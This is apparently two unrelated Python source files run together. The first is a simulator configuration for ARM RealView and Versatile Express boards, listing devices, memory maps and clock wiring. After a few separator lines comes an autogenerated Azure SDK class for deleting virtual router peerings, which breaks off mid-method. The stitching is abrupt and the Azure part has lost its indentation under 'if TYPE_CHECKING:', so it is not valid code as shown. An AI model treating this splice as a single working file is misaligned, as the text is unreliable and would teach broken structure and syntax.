    ignore_access = Param.Bool(False, "Ignore reads/writes to this device, (e.g. IsaFake + AMBA)")
    # Fake devices report a zero AMBA ID (stray C-style ';' removed).
    amba_id = 0
class Pl011(Uart):
    '''ARM PL011 UART model.'''
    type = 'Pl011'
    cxx_header = "dev/arm/pl011.hh"
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    int_num = Param.UInt32("Interrupt number that connects to GIC")
    # Useful for ending batch simulations when the workload signals EOT.
    end_on_eot = Param.Bool(False, "End the simulation when a EOT is received on the UART")
    int_delay = Param.Latency("100ns", "Time between action and interrupt generation by UART")
class Sp804(AmbaPioDevice):
    '''ARM SP804 dual-timer module (two timers per device).'''
    type = 'Sp804'
    cxx_header = "dev/arm/timer_sp804.hh"
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    int_num0 = Param.UInt32("Interrupt number that connects to GIC")
    clock0 = Param.Clock('1MHz', "Clock speed of the input")
    int_num1 = Param.UInt32("Interrupt number that connects to GIC")
    clock1 = Param.Clock('1MHz', "Clock speed of the input")
    amba_id = 0x00141804
class CpuLocalTimer(BasicPioDevice):
    '''Per-CPU private timer and watchdog block.'''
    type = 'CpuLocalTimer'
    cxx_header = "dev/arm/timer_cpulocal.hh"
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    # Typo fix in description: "Interrrupt" -> "Interrupt"
    # (matches the wording used by GenericTimer below).
    int_num_timer = Param.UInt32("Interrupt number used per-cpu to GIC")
    int_num_watchdog = Param.UInt32("Interrupt number for per-cpu watchdog to GIC")
class GenericTimer(SimObject):
    '''ARM architected generic timer.'''
    type = 'GenericTimer'
    cxx_header = "dev/arm/generic_timer.hh"
    system = Param.System(Parent.any, "system")
    gic = Param.BaseGic(Parent.any, "GIC to use for interrupting")
    int_num = Param.UInt32("Interrupt number used per-cpu to GIC")
    # @todo: for now only one timer per CPU is supported, which is the
    # normal behaviour when Security and Virt. extensions are disabled.
class PL031(AmbaIntDevice):
    '''ARM PL031 real-time clock.'''
    type = 'PL031'
    cxx_header = "dev/arm/rtc_pl031.hh"
    time = Param.Time('01/01/2009', "System time to use ('Now' for actual time)")
    amba_id = 0x00341031
class Pl050(AmbaIntDevice):
    '''ARM PL050 keyboard/mouse interface (PS/2 style KMI).'''
    type = 'Pl050'
    cxx_header = "dev/arm/kmi.hh"
    vnc = Param.VncInput(Parent.any, "Vnc server for remote frame buffer display")
    is_mouse = Param.Bool(False, "Is this interface a mouse, if not a keyboard")
    int_delay = '1us'
    amba_id = 0x00141050
class Pl111(AmbaDmaDevice):
    '''ARM PL111 CLCD (colour LCD) controller.'''
    type = 'Pl111'
    cxx_header = "dev/arm/pl111.hh"
    pixel_clock = Param.Clock('24MHz', "Pixel clock")
    vnc = Param.VncInput(Parent.any, "Vnc server for remote frame buffer display")
    amba_id = 0x00141111
    # NOTE: capture disabled locally (upstream default is True).
    enable_capture = Param.Bool(False, "capture frame to system.framebuffer.bmp")
class HDLcd(AmbaDmaDevice):
    '''ARM HDLCD display controller.'''
    type = 'HDLcd'
    cxx_header = "dev/arm/hdlcd.hh"

    # For reference, 1024x768MR-16@60 ~= 56 MHz
    #                1920x1080MR-16@60 ~= 137 MHz
    #                3840x2160MR-16@60 ~= 533 MHz
    # Match against the resolution selected in the Linux DTS/DTB file.
    pixel_clock = Param.Clock('137MHz', "Clock frequency of the pixel clock "
                                        "(i.e. PXLREFCLK / OSCCLK 5")

    vnc = Param.VncInput(Parent.any, "Vnc server for remote frame buffer "
                                     "display")

    amba_id = 0x00141000
    # NOTE: capture disabled locally (upstream default is True).
    enable_capture = Param.Bool(False, "capture frame to system.framebuffer.bmp")
class RealView(Platform):
    '''Base platform for ARM RealView/Versatile Express style boards.

    Subclasses define the concrete device/address map and override the
    attach*/clock-domain hooks below.
    '''
    type = 'RealView'
    cxx_header = "dev/arm/realview.hh"
    system = Param.System(Parent.any, "system")
    pci_io_base = Param.Addr(0, "Base address of PCI IO Space")
    pci_cfg_base = Param.Addr(0, "Base address of PCI Configuraiton Space")
    pci_cfg_gen_offsets = Param.Bool(False, "Should the offsets used for PCI cfg access"
            " be compatible with the pci-generic-host or the legacy host bridge?")
    # Default physical memory region; subclasses may override.
    _mem_regions = [(Addr(0), Addr('256MB'))]

    def attachPciDevices(self):
        # No PCI devices by default; subclasses override as needed.
        pass

    def enableMSIX(self):
        # MSI-X not supported by the base platform.
        pass

    def onChipIOClkDomain(self, clkdomain):
        # Hook: assign a clock domain to on-chip I/O devices.
        pass

    def offChipIOClkDomain(self, clkdomain):
        # Hook: assign a clock domain to off-chip I/O devices.
        pass

    def setupBootLoader(self, mem_bus, cur_sys, loc):
        # Boot loader lives in a 64MB non-volatile memory at 2GB that is
        # not reported in the configuration table.
        self.nvmem = SimpleMemory(range = AddrRange('2GB', size = '64MB'),
                                  conf_table_reported = False)
        self.nvmem.port = mem_bus.master
        cur_sys.boot_loader = loc('boot.arm')
        cur_sys.atags_addr = 0x100
        cur_sys.load_addr_mask = 0xfffffff
        cur_sys.load_offset = 0
# Reference for memory map and interrupt number
# RealView Platform Baseboard Explore for Cortex-A9 User Guide(ARM DUI 0440A)
# Chapter 4: Programmer's Reference
class RealViewPBX(RealView):
    '''RealView Platform Baseboard Explore for Cortex-A9.

    Memory map and interrupt numbers follow ARM DUI 0440A, Chapter 4
    (Programmer's Reference).
    '''
    # --- Real devices ---
    uart = Pl011(pio_addr=0x10009000, int_num=44)
    realview_io = RealViewCtrl(pio_addr=0x10000000)
    gic = Pl390()
    timer0 = Sp804(int_num0=36, int_num1=36, pio_addr=0x10011000)
    timer1 = Sp804(int_num0=37, int_num1=37, pio_addr=0x10012000)
    local_cpu_timer = CpuLocalTimer(int_num_timer=29, int_num_watchdog=30, pio_addr=0x1f000600)
    clcd = Pl111(pio_addr=0x10020000, int_num=55)
    kmi0 = Pl050(pio_addr=0x10006000, int_num=52)
    kmi1 = Pl050(pio_addr=0x10007000, int_num=53, is_mouse=True)
    a9scu = A9SCU(pio_addr=0x1f000000)
    # CompactFlash controller exposed through a legacy IDE interface.
    cf_ctrl = IdeController(disks=[], pci_func=0, pci_dev=7, pci_bus=2,
                            io_shift = 1, ctrl_offset = 2, Command = 0x1,
                            BAR0 = 0x18000000, BAR0Size = '16B',
                            BAR1 = 0x18000100, BAR1Size = '1B',
                            BAR0LegacyIO = True, BAR1LegacyIO = True)

    # --- Fake devices that only decode their address range ---
    l2x0_fake = IsaFake(pio_addr=0x1f002000, pio_size=0xfff)
    flash_fake = IsaFake(pio_addr=0x40000000, pio_size=0x20000000,
                         fake_mem=True)
    dmac_fake = AmbaFake(pio_addr=0x10030000)
    uart1_fake = AmbaFake(pio_addr=0x1000a000)
    uart2_fake = AmbaFake(pio_addr=0x1000b000)
    uart3_fake = AmbaFake(pio_addr=0x1000c000)
    smc_fake = AmbaFake(pio_addr=0x100e1000)
    sp810_fake = AmbaFake(pio_addr=0x10001000, ignore_access=True)
    watchdog_fake = AmbaFake(pio_addr=0x10010000)
    gpio0_fake = AmbaFake(pio_addr=0x10013000)
    gpio1_fake = AmbaFake(pio_addr=0x10014000)
    gpio2_fake = AmbaFake(pio_addr=0x10015000)
    ssp_fake = AmbaFake(pio_addr=0x1000d000)
    sci_fake = AmbaFake(pio_addr=0x1000e000)
    aaci_fake = AmbaFake(pio_addr=0x10004000)
    mmc_fake = AmbaFake(pio_addr=0x10005000)
    rtc = PL031(pio_addr=0x10017000, int_num=42)
    energy_ctrl = EnergyCtrl(pio_addr=0x1000f000)

    # Attach I/O devices that are on chip and also set the appropriate
    # ranges for the bridge
    def attachOnChipIO(self, bus, bridge):
        self.gic.pio = bus.master
        self.l2x0_fake.pio = bus.master
        self.a9scu.pio = bus.master
        self.local_cpu_timer.pio = bus.master
        # Bridge ranges based on excluding what is part of on-chip I/O
        # (gic, l2x0, a9scu, local_cpu_timer)
        bridge.ranges = [AddrRange(self.realview_io.pio_addr,
                                   self.a9scu.pio_addr - 1),
                         AddrRange(self.flash_fake.pio_addr,
                                   self.flash_fake.pio_addr + \
                                   self.flash_fake.pio_size - 1)]

    # Set the clock domain for IO objects that are considered
    # to be "close" to the cores.
    def onChipIOClkDomain(self, clkdomain):
        self.gic.clk_domain = clkdomain
        self.l2x0_fake.clk_domain = clkdomain
        # NOTE(review): 'clkdomain' attribute name differs from the
        # 'clk_domain' used everywhere else here — verify upstream.
        self.a9scu.clkdomain = clkdomain
        self.local_cpu_timer.clk_domain = clkdomain

    # Attach I/O devices to specified bus object.  Can't do this
    # earlier, since the bus object itself is typically defined at the
    # System level.
    def attachIO(self, bus):
        self.uart.pio = bus.master
        self.realview_io.pio = bus.master
        self.timer0.pio = bus.master
        self.timer1.pio = bus.master
        self.clcd.pio = bus.master
        self.clcd.dma = bus.slave
        self.kmi0.pio = bus.master
        self.kmi1.pio = bus.master
        self.cf_ctrl.pio = bus.master
        self.cf_ctrl.config = bus.master
        self.cf_ctrl.dma = bus.slave
        self.dmac_fake.pio = bus.master
        self.uart1_fake.pio = bus.master
        self.uart2_fake.pio = bus.master
        self.uart3_fake.pio = bus.master
        self.smc_fake.pio = bus.master
        self.sp810_fake.pio = bus.master
        self.watchdog_fake.pio = bus.master
        self.gpio0_fake.pio = bus.master
        self.gpio1_fake.pio = bus.master
        self.gpio2_fake.pio = bus.master
        self.ssp_fake.pio = bus.master
        self.sci_fake.pio = bus.master
        self.aaci_fake.pio = bus.master
        self.mmc_fake.pio = bus.master
        self.rtc.pio = bus.master
        self.flash_fake.pio = bus.master
        self.energy_ctrl.pio = bus.master

    # Set the clock domain for IO objects that are considered
    # to be "far" away from the cores.
    def offChipIOClkDomain(self, clkdomain):
        self.uart.clk_domain = clkdomain
        self.realview_io.clk_domain = clkdomain
        self.timer0.clk_domain = clkdomain
        self.timer1.clk_domain = clkdomain
        self.clcd.clk_domain = clkdomain
        self.kmi0.clk_domain = clkdomain
        self.kmi1.clk_domain = clkdomain
        self.cf_ctrl.clk_domain = clkdomain
        self.dmac_fake.clk_domain = clkdomain
        self.uart1_fake.clk_domain = clkdomain
        self.uart2_fake.clk_domain = clkdomain
        self.uart3_fake.clk_domain = clkdomain
        self.smc_fake.clk_domain = clkdomain
        self.sp810_fake.clk_domain = clkdomain
        self.watchdog_fake.clk_domain = clkdomain
        self.gpio0_fake.clk_domain = clkdomain
        self.gpio1_fake.clk_domain = clkdomain
        self.gpio2_fake.clk_domain = clkdomain
        self.ssp_fake.clk_domain = clkdomain
        self.sci_fake.clk_domain = clkdomain
        self.aaci_fake.clk_domain = clkdomain
        self.mmc_fake.clk_domain = clkdomain
        self.rtc.clk_domain = clkdomain
        self.flash_fake.clk_domain = clkdomain
        self.energy_ctrl.clk_domain = clkdomain
# Reference for memory map and interrupt number
# RealView Emulation Baseboard User Guide (ARM DUI 0143B)
# Chapter 4: Programmer's Reference
class RealViewEB(RealView):
    '''RealView Emulation Baseboard.

    Memory map and interrupt numbers follow ARM DUI 0143B, Chapter 4
    (Programmer's Reference).

    Bug fix: ``offChipIOClkDomain`` referenced ``self.rtc``, but this
    platform defines only ``rtc_fake`` (see ``attachIO``), so the method
    raised an AttributeError when invoked; it now uses ``rtc_fake``.
    '''
    # --- Real devices ---
    uart = Pl011(pio_addr=0x10009000, int_num=44)
    realview_io = RealViewCtrl(pio_addr=0x10000000, idreg=0x01400500)
    gic = Pl390(dist_addr=0x10041000, cpu_addr=0x10040000)
    timer0 = Sp804(int_num0=36, int_num1=36, pio_addr=0x10011000)
    timer1 = Sp804(int_num0=37, int_num1=37, pio_addr=0x10012000)
    clcd = Pl111(pio_addr=0x10020000, int_num=23)
    kmi0 = Pl050(pio_addr=0x10006000, int_num=20)
    kmi1 = Pl050(pio_addr=0x10007000, int_num=21, is_mouse=True)

    # --- Fake devices that only decode their address range ---
    l2x0_fake = IsaFake(pio_addr=0x1f002000, pio_size=0xfff, warn_access="1")
    flash_fake = IsaFake(pio_addr=0x40000000, pio_size=0x20000000-1,
                         fake_mem=True)
    dmac_fake = AmbaFake(pio_addr=0x10030000)
    uart1_fake = AmbaFake(pio_addr=0x1000a000)
    uart2_fake = AmbaFake(pio_addr=0x1000b000)
    uart3_fake = AmbaFake(pio_addr=0x1000c000)
    smcreg_fake = IsaFake(pio_addr=0x10080000, pio_size=0x10000-1)
    smc_fake = AmbaFake(pio_addr=0x100e1000)
    sp810_fake = AmbaFake(pio_addr=0x10001000, ignore_access=True)
    watchdog_fake = AmbaFake(pio_addr=0x10010000)
    gpio0_fake = AmbaFake(pio_addr=0x10013000)
    gpio1_fake = AmbaFake(pio_addr=0x10014000)
    gpio2_fake = AmbaFake(pio_addr=0x10015000)
    ssp_fake = AmbaFake(pio_addr=0x1000d000)
    sci_fake = AmbaFake(pio_addr=0x1000e000)
    aaci_fake = AmbaFake(pio_addr=0x10004000)
    mmc_fake = AmbaFake(pio_addr=0x10005000)
    rtc_fake = AmbaFake(pio_addr=0x10017000, amba_id=0x41031)
    energy_ctrl = EnergyCtrl(pio_addr=0x1000f000)

    # Attach I/O devices that are on chip and also set the appropriate
    # ranges for the bridge
    def attachOnChipIO(self, bus, bridge):
        self.gic.pio = bus.master
        self.l2x0_fake.pio = bus.master
        # Bridge ranges based on excluding what is part of on-chip I/O
        # (gic, l2x0)
        bridge.ranges = [AddrRange(self.realview_io.pio_addr,
                                   self.gic.cpu_addr - 1),
                         AddrRange(self.flash_fake.pio_addr, Addr.max)]

    # Set the clock domain for IO objects that are considered
    # to be "close" to the cores.
    def onChipIOClkDomain(self, clkdomain):
        self.gic.clk_domain = clkdomain
        self.l2x0_fake.clk_domain = clkdomain

    # Attach I/O devices to specified bus object.  Can't do this
    # earlier, since the bus object itself is typically defined at the
    # System level.
    def attachIO(self, bus):
        self.uart.pio = bus.master
        self.realview_io.pio = bus.master
        self.timer0.pio = bus.master
        self.timer1.pio = bus.master
        self.clcd.pio = bus.master
        self.clcd.dma = bus.slave
        self.kmi0.pio = bus.master
        self.kmi1.pio = bus.master
        self.dmac_fake.pio = bus.master
        self.uart1_fake.pio = bus.master
        self.uart2_fake.pio = bus.master
        self.uart3_fake.pio = bus.master
        self.smc_fake.pio = bus.master
        self.sp810_fake.pio = bus.master
        self.watchdog_fake.pio = bus.master
        self.gpio0_fake.pio = bus.master
        self.gpio1_fake.pio = bus.master
        self.gpio2_fake.pio = bus.master
        self.ssp_fake.pio = bus.master
        self.sci_fake.pio = bus.master
        self.aaci_fake.pio = bus.master
        self.mmc_fake.pio = bus.master
        self.rtc_fake.pio = bus.master
        self.flash_fake.pio = bus.master
        self.smcreg_fake.pio = bus.master
        self.energy_ctrl.pio = bus.master

    # Set the clock domain for IO objects that are considered
    # to be "far" away from the cores.
    def offChipIOClkDomain(self, clkdomain):
        self.uart.clk_domain = clkdomain
        self.realview_io.clk_domain = clkdomain
        self.timer0.clk_domain = clkdomain
        self.timer1.clk_domain = clkdomain
        self.clcd.clk_domain = clkdomain
        self.kmi0.clk_domain = clkdomain
        self.kmi1.clk_domain = clkdomain
        self.dmac_fake.clk_domain = clkdomain
        self.uart1_fake.clk_domain = clkdomain
        self.uart2_fake.clk_domain = clkdomain
        self.uart3_fake.clk_domain = clkdomain
        self.smc_fake.clk_domain = clkdomain
        self.sp810_fake.clk_domain = clkdomain
        self.watchdog_fake.clk_domain = clkdomain
        self.gpio0_fake.clk_domain = clkdomain
        self.gpio1_fake.clk_domain = clkdomain
        self.gpio2_fake.clk_domain = clkdomain
        self.ssp_fake.clk_domain = clkdomain
        self.sci_fake.clk_domain = clkdomain
        self.aaci_fake.clk_domain = clkdomain
        self.mmc_fake.clk_domain = clkdomain
        # Was 'self.rtc' — this platform only has 'rtc_fake'.
        self.rtc_fake.clk_domain = clkdomain
        self.flash_fake.clk_domain = clkdomain
        self.smcreg_fake.clk_domain = clkdomain
        self.energy_ctrl.clk_domain = clkdomain
class VExpress_EMM(RealView):
    """ARM Versatile Express platform with the extended memory map (EMM).

    The class-level assignments declare the platform's memory-mapped
    devices; the attach*() / *ClkDomain() methods wire them to a bus and
    clock domain once those objects exist at the System level.
    """
    _mem_regions = [(Addr('2GB'), Addr('2GB'))]
    pci_cfg_base = 0x30000000
    uart = Pl011(pio_addr=0x1c090000, int_num=37)
    realview_io = RealViewCtrl(proc_id0=0x14000000, proc_id1=0x14000000, \
                               idreg=0x02250000, pio_addr=0x1C010000)
    gic = Pl390(dist_addr=0x2C001000, cpu_addr=0x2C002000)
    local_cpu_timer = CpuLocalTimer(int_num_timer=29, int_num_watchdog=30, pio_addr=0x2C080000)
    generic_timer = GenericTimer(int_num=29)
    timer0 = Sp804(int_num0=34, int_num1=34, pio_addr=0x1C110000, clock0='1MHz', clock1='1MHz')
    timer1 = Sp804(int_num0=35, int_num1=35, pio_addr=0x1C120000, clock0='1MHz', clock1='1MHz')
    clcd = Pl111(pio_addr=0x1c1f0000, int_num=46)
    hdlcd = HDLcd(pio_addr=0x2b000000, int_num=117)
    kmi0 = Pl050(pio_addr=0x1c060000, int_num=44)
    kmi1 = Pl050(pio_addr=0x1c070000, int_num=45, is_mouse=True)
    vgic = VGic(vcpu_addr=0x2c006000, hv_addr=0x2c004000, ppint=25)
    cf_ctrl = IdeController(disks=[], pci_func=0, pci_dev=0, pci_bus=2,
                            io_shift = 2, ctrl_offset = 2, Command = 0x1,
                            BAR0 = 0x1C1A0000, BAR0Size = '256B',
                            BAR1 = 0x1C1A0100, BAR1Size = '4096B',
                            BAR0LegacyIO = True, BAR1LegacyIO = True)
    pciconfig = PciConfigAll(size='256MB')
    vram = SimpleMemory(range = AddrRange(0x18000000, size='32MB'),
                        conf_table_reported = False)
    rtc = PL031(pio_addr=0x1C170000, int_num=36)
    l2x0_fake = IsaFake(pio_addr=0x2C100000, pio_size=0xfff)
    uart1_fake = AmbaFake(pio_addr=0x1C0A0000)
    uart2_fake = AmbaFake(pio_addr=0x1C0B0000)
    uart3_fake = AmbaFake(pio_addr=0x1C0C0000)
    sp810_fake = AmbaFake(pio_addr=0x1C020000, ignore_access=True)
    watchdog_fake = AmbaFake(pio_addr=0x1C0F0000)
    aaci_fake = AmbaFake(pio_addr=0x1C040000)
    lan_fake = IsaFake(pio_addr=0x1A000000, pio_size=0xffff)
    usb_fake = IsaFake(pio_addr=0x1B000000, pio_size=0x1ffff)
    mmc_fake = AmbaFake(pio_addr=0x1c050000)
    energy_ctrl = EnergyCtrl(pio_addr=0x1c080000)

    # Attach any PCI devices that are supported
    def attachPciDevices(self):
        """Instantiate the optional PCI NIC and IDE controller.

        attachIO() connects them later if (and only if) this was called.
        """
        self.ethernet = IGbE_e1000(pci_bus=0, pci_dev=0, pci_func=0,
                                   InterruptLine=1, InterruptPin=1)
        self.ide = IdeController(disks = [], pci_bus=0, pci_dev=1, pci_func=0,
                                 InterruptLine=2, InterruptPin=2)

    def enableMSIX(self):
        """Replace the GIC with one that has enough interrupt lines for
        MSI-X and add a GICv2m message-based-interrupt frame."""
        self.gic = Pl390(dist_addr=0x2C001000, cpu_addr=0x2C002000, it_lines=512)
        self.gicv2m = Gicv2m()
        self.gicv2m.frames = [Gicv2mFrame(spi_base=256, spi_len=64, addr=0x2C1C0000)]

    def setupBootLoader(self, mem_bus, cur_sys, loc):
        """Create the boot flash, connect it to *mem_bus* and point
        *cur_sys* at the 32-bit boot loader image."""
        self.nvmem = SimpleMemory(range = AddrRange('64MB'),
                                  conf_table_reported = False)
        self.nvmem.port = mem_bus.master
        cur_sys.boot_loader = loc('boot_emm.arm')
        cur_sys.atags_addr = 0x8000000
        cur_sys.load_addr_mask = 0xfffffff
        cur_sys.load_offset = 0x80000000

    # Attach I/O devices that are on chip and also set the appropriate
    # ranges for the bridge
    def attachOnChipIO(self, bus, bridge):
        """Connect the on-chip devices to *bus* and restrict *bridge* to
        the address ranges NOT claimed by on-chip I/O."""
        self.gic.pio = bus.master
        self.local_cpu_timer.pio = bus.master
        # The GICv2m only exists if enableMSIX() was called.
        if hasattr(self, "gicv2m"):
            self.gicv2m.pio = bus.master
        self.hdlcd.dma = bus.slave
        # Bridge ranges based on excluding what is part of on-chip I/O
        # (gic, a9scu)
        bridge.ranges = [AddrRange(0x2F000000, size='16MB'),
                         AddrRange(0x2B000000, size='4MB'),
                         AddrRange(0x30000000, size='256MB'),
                         AddrRange(0x40000000, size='512MB'),
                         AddrRange(0x18000000, size='64MB'),
                         AddrRange(0x1C000000, size='64MB')]
        self.vgic.pio = bus.master

    # Set the clock domain for IO objects that are considered
    # to be "close" to the cores.
    def onChipIOClkDomain(self, clkdomain):
        """Assign *clkdomain* to the on-chip devices."""
        self.gic.clk_domain = clkdomain
        if hasattr(self, "gicv2m"):
            self.gicv2m.clk_domain = clkdomain
        self.hdlcd.clk_domain = clkdomain
        self.vgic.clk_domain = clkdomain

    # Attach I/O devices to specified bus object. Done here
    # as the specified bus to connect to may not always be fixed.
    def attachIO(self, bus):
        """Bind all off-chip devices to *bus*, including the optional PCI
        devices when attachPciDevices() created them."""
        self.uart.pio = bus.master
        self.realview_io.pio = bus.master
        self.timer0.pio = bus.master
        self.timer1.pio = bus.master
        self.clcd.pio = bus.master
        self.clcd.dma = bus.slave
        self.hdlcd.pio = bus.master
        self.kmi0.pio = bus.master
        self.kmi1.pio = bus.master
        self.cf_ctrl.pio = bus.master
        self.cf_ctrl.dma = bus.slave
        self.cf_ctrl.config = bus.master
        self.rtc.pio = bus.master
        bus.use_default_range = True
        self.vram.port = bus.master
        self.pciconfig.pio = bus.default
        self.l2x0_fake.pio = bus.master
        self.uart1_fake.pio = bus.master
        self.uart2_fake.pio = bus.master
        self.uart3_fake.pio = bus.master
        self.sp810_fake.pio = bus.master
        self.watchdog_fake.pio = bus.master
        self.aaci_fake.pio = bus.master
        self.lan_fake.pio = bus.master
        self.usb_fake.pio = bus.master
        self.mmc_fake.pio = bus.master
        self.energy_ctrl.pio = bus.master
        # Attach the PCI devices only if attachPciDevices() created them.
        # Catch just AttributeError: a bare 'except' would also silently
        # swallow real configuration errors (e.g. a mistyped port name).
        try:
            self.ide.pio = bus.master
            self.ide.config = bus.master
            self.ide.dma = bus.slave
            self.ethernet.pio = bus.master
            self.ethernet.config = bus.master
            self.ethernet.dma = bus.slave
        except AttributeError:
            pass

    # Set the clock domain for IO objects that are considered
    # to be "far" away from the cores.
    def offChipIOClkDomain(self, clkdomain):
        """Assign *clkdomain* to every off-chip device."""
        self.uart.clk_domain = clkdomain
        self.realview_io.clk_domain = clkdomain
        self.timer0.clk_domain = clkdomain
        self.timer1.clk_domain = clkdomain
        self.clcd.clk_domain = clkdomain
        self.kmi0.clk_domain = clkdomain
        self.kmi1.clk_domain = clkdomain
        self.cf_ctrl.clk_domain = clkdomain
        self.rtc.clk_domain = clkdomain
        self.vram.clk_domain = clkdomain
        self.pciconfig.clk_domain = clkdomain
        self.l2x0_fake.clk_domain = clkdomain
        self.uart1_fake.clk_domain = clkdomain
        self.uart2_fake.clk_domain = clkdomain
        self.uart3_fake.clk_domain = clkdomain
        self.sp810_fake.clk_domain = clkdomain
        self.watchdog_fake.clk_domain = clkdomain
        self.aaci_fake.clk_domain = clkdomain
        self.lan_fake.clk_domain = clkdomain
        self.usb_fake.clk_domain = clkdomain
        self.mmc_fake.clk_domain = clkdomain
        self.energy_ctrl.clk_domain = clkdomain
class VExpress_EMM64(VExpress_EMM):
    """VExpress_EMM variant with the 64-bit boot loader and an extended
    physical memory map."""
    pci_io_base = 0x2f000000
    pci_cfg_gen_offsets = True
    # Three memory regions are specified totalling 512GB
    _mem_regions = [(Addr('2GB'), Addr('2GB')), (Addr('34GB'), Addr('30GB')),
                    (Addr('512GB'), Addr('480GB'))]

    def setupBootLoader(self, mem_bus, cur_sys, loc):
        """Create the boot flash, connect it to *mem_bus* and point
        *cur_sys* at the AArch64 boot loader image."""
        bootmem = SimpleMemory(range=AddrRange(0, size='64MB'))
        self.nvmem = bootmem
        self.nvmem.port = mem_bus.master
        cur_sys.boot_loader = loc('boot_emm.arm64')
        cur_sys.atags_addr = 0x8000000
        cur_sys.load_addr_mask = 0xfffffff
        cur_sys.load_offset = 0x80000000
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualRouterPeeringsOperations(object):
    """VirtualRouterPeeringsOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.network.v2019_07_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # Serialization model classes shared by every method in this group.
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    # Internal: performs the initial DELETE request of the long-running
    # delete operation; begin_delete() wraps it with an LRO poller.
    def _delete_initial(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        peering_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> None
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-07-01"
        accept = "application/json"
        # Construct URL
        url = self._delete_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 200/202: accepted or in progress; 204: already gone.
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
    def begin_delete(
        self,
        resource_group_name, # type: str
        virtual_router_name, # type: str
        peering_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> LROPoller[None]
        """Deletes the specified peering from a Virtual Router.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param virtual_router_name: The name of the Virtual Router.
        :type virtual_router_name: str
        :param peering_name: The name of the peering.
        :type peering_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling.
        Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            raw_result = self._delete_initial(
                resource_group_name=resource_group_name,
                virtual_router_name=virtual_router_name,
                peering_name=peering_name,
                # Pass the raw PipelineResponse through so the poller can
                # inspect it; the user-supplied cls is applied on output.
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
            'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        # This delete LRO reports completion via the Location header.
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
